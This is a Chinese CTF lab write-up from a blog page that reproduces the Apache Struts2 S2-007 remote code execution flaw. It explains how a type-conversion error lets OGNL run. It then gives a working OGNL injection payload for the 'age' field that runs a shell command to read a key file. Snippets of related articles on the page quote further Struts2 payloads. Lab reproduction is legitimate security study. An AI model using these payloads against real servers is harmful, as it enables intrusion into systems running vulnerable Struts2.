CTF-Apache Struts2远程代码执行漏洞(S2-007)复现

最新推荐文章于 2025-04-22 19:18:08 发布
最新推荐文章于 2025-04-22 19:18:08 发布
阅读量538 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/asd158923328/article/details/99935677
本文介绍了Apache Struts2 S2-007漏洞的形成原因,该漏洞源于配置错误导致的OGNL语句执行。实验环境中,发现输入框限制长度且只能为text,通过构造特定payload,在登录界面的age字段注入,实现了远程代码执行,例如执行`cat /key.txt`来读取文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据题意
在这里插入图片描述
形成原因:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行。
进入环境,查看源码,
在这里插入图片描述
在这里插入图片描述
限制了三个输入框的的值只能为text,而且长度在540以上,
然后在登录界面用户名和邮箱值随意,age部分改为我们的payload
’ + (#_memberAccess[“allowStaticMethodAccess”]=true,#foo=new java.lang.Boolean(“false”) ,#context[“xwork.MethodAccessor.denyMethodExecution”]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘cat /key.txt’).getInputStream())) + ’
在这里插入图片描述

最低0.47元/天 解锁文章

200万优质内容无限畅学
Apache Struts2远程代码执行漏洞复现(CVE-2021-31805)
0xSec
01-12 1602
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。
Apache Struts2远程代码执行漏洞(S2-001)复现
oiadkt的博客
05-04 3421
Apache Struts2远程代码执行漏洞(S2-001)复现
墨者学院_Apache Struts2远程代码执行漏洞(S2-007)复现
热门推荐
cc_de_csdn的博客
08-26 1万+
打开靶场,任意填写表单并提交 使用BrupSuite捕获报文 修改age的值为: %27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccesso...
08#墨者靶场-Apache Struts2远程代码执行漏洞(S2-015)复现
shy的博客
11-25 1512
墨者学习 By/shy014 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。并且该版本存在高危漏洞,...
CTF-Apache Struts2远程代码执行漏洞(S2-037)复现
asd158923328的博客
08-22 1733
根据题意 漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有s...
CTF-Apache Struts2远程代码执行漏洞(S2-001)复现
asd158923328的博客
08-21 831
根据题意 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 S2-001 原理:该漏洞其实是因为用户提交表单数据并且验证失败时,后端会将用...
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 3211
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
360众测靶场题库之15- Apache Struts2远程代码执行漏洞(S2-029)
zjl12344的博客
03-06 286
360众测靶场题库
CTF-Apache Struts2远程代码执行漏洞(S2-032)复现
asd158923328的博客
08-22 924
根据题意 漏洞原理:当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式 任意命令执行Exp: %23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setChara...
CTF-Apache Struts2远程代码执行漏洞(S2-015)复现
asd158923328的博客
08-21 865
根据题意 针对 Action 名称进行默认字符限制 [a-z][A-Z][0-9][.-_!/] 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如:/{1}.jsp 上述配置能让我们访问 name.action 时使用 name.jsp来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践...
漏洞复现Struts2系列
最新发布
blackpeach的博客
04-22 852
Structs2系列:恶意的OGNL表达式 ,可造成 任意代码执行
S2-007漏洞复现
baidu_38844729的博客
11-14 355
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
ctfshow刷题 [struts2]
weixin_44807430的博客
01-08 925
纯粹且坚持
apache 报错信息隐藏_CTF之信息泄漏
weixin_35945980的博客
12-08 444
web源码泄漏.hg源码泄漏:漏洞成因:hg init的时候会生成.hg,http://www.xx.com/.hg/,工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/).git源码泄漏:漏洞成因:在运行git init初始化代码库的时候,会在当前目录下产生一个.git的隐藏文件,用来记录代码的变更记录等,没有删除这个文件,导...
java struts2漏洞ctfshow279)
2202_75317918的博客
03-04 924
struts2漏洞 S2-001是当用户提交表单数据且验证失败时,服务器使用OGNL表达式解析用户先前提交的参数值,%{value}并重新填充相应的表单数据。这里的%{value}简单理解就是和flask的模板注入{{}}差不多 会对里面的内容进行解析因此我们可以利用其进行命令执行。
s2系列——s2-007,s2-008,s2-009复现
qq_54030686的博客
03-02 7143
s2-007,s2-008,s2-009复现 简而言之就是payload的输入,具体复现这里不再复现,相关博文,也有蛮多,这里更新下脚本 s2-007 def s2007(url): try: proxy = '192.168.43.74:8080' # 本地代理 proxies = { 'http': 'http://' + proxy, 'https': 'https://' + proxy }
NSSCTF实战:Apache log4j漏洞靶机(CVE-2021-44228)
weixin_52270928的博客
05-09 730
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对用户输入内容进行严格的判断,从而造成漏洞的发生。
CTF2
qq_41409656的博客
01-18 1320
题1:ipspoofing直接访问,查看源码都没发现什么把网页啦到最下面点击进入后发现是一个登陆界面,在登陆界面查看网页源码,发现用户名和面直接在网页登陆发提示IP不在范围内,通过Burp抓包登陆看看发现提示了一个127.0.0.1的IP,伪造一个IP看看,获得flag题2: phpinfo直接访问就是一个phpinfo()的放回信息,而且链接变成了 index.php?path=phpinfo.
Web-CTF-帮助:用于Web渗透测试的实用脚本集
根据给定文件信息,可以看出这是一款针对Web CTF(Capture The Flag)竞赛的脚本集工具,名为"web-ctf-help"。Web CTF是一种信息安全竞赛,参与者需要找到网站的安全漏洞,并对其进行利用。此工具主要提供了一系列的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值